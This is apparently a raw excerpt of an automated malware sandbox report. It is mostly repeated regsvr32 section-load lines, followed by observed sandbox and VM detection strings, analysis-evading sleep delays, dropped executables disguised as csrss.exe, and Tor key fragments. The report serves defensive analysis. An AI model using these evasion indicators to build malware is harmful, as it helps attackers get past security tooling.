Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\SElF.eXe
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \KnownDlls32\TestaPP.exE

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ibjhisi, 00000003.00000002.1928961778.00000000005BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: xqz8sQ4mZB.exe, 00000000.00000002.1690484757.000000000070E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKV

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 389	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1354	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 659	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 414	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 419	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 780	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 753	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Window / User API: threadDelayed 3566	Jump to behavior
Source: C:\ProgramData\Drivers\csrss.exe	Window / User API: threadDelayed 9645
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3162
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 450

Source: C:\Windows\explorer.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2E76.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API coverage: 9.2 %

Source: C:\Windows\explorer.exe TID: 6772	Thread sleep time: -135400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6768	Thread sleep time: -65900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6772	Thread sleep time: -41900s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe TID: 5740	Thread sleep time: -356600s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe TID: 6168	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe TID: 6916	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\Drivers\csrss.exe TID: 984	Thread sleep count: 9645 > 30
Source: C:\ProgramData\Drivers\csrss.exe TID: 984	Thread sleep time: -964500s >= -30000s
Source: C:\ProgramData\Drivers\csrss.exe TID: 984	Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6284	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1464	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\4E3.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: C:\ProgramData\Drivers\csrss.exe	Last function: Thread delayed
Source: C:\ProgramData\Drivers\csrss.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_D217.exe_bc845d3a7a388bf7bd3d9ba7ed8831bf754e15_85635c02_c67bd312-d49c-415a-84c9-9c6b02ebf720\
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\SysWOW64\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DFD5.exe_395aa9c4c8dd1dc99b3d53c1dce5dca5a40509e_b10f0b35_8cbadb55-0125-471e-a71e-1fcc76aec1cd\

Source: explorer.exe, 00000001.00000000.1683495531.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1679822993.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1680983414.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 4E3.exe, 0000001D.00000002.4256235874.0000000002B6C000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: ameNewaPINGPOSTPathQEMUROOTH
Source: explorer.exe, 00000001.00000000.1682291427.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1682291427.000000000982D000.00000004.00000001.00020000.00000000.sdmp, D217.exe, 00000008.00000002.2062320017.000000000196E000.00000004.00000020.00020000.00000000.sdmp, D217.exe, 00000008.00000003.2014983087.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, D217.exe, 00000008.00000002.2062477491.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2084253990.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.2084386218.000000000122D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: csrss.exe, 0000001C.00000002.4254384912.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: CA65.exe, 00000007.00000003.3062366142.0000000003463000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntor-onion-key zeABkSC5U36c9jPkbqVUzrjd6qt+/Rti3yHGfsRtYhY
Source: CA65.exe, 00000007.00000003.3077363270.0000000003477000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MIGJAoGBAJtcCCBEuPXqEMu2rREZdSYB+1TY6HE/BWrbN1/ZfMwxUulfEocqfD/3
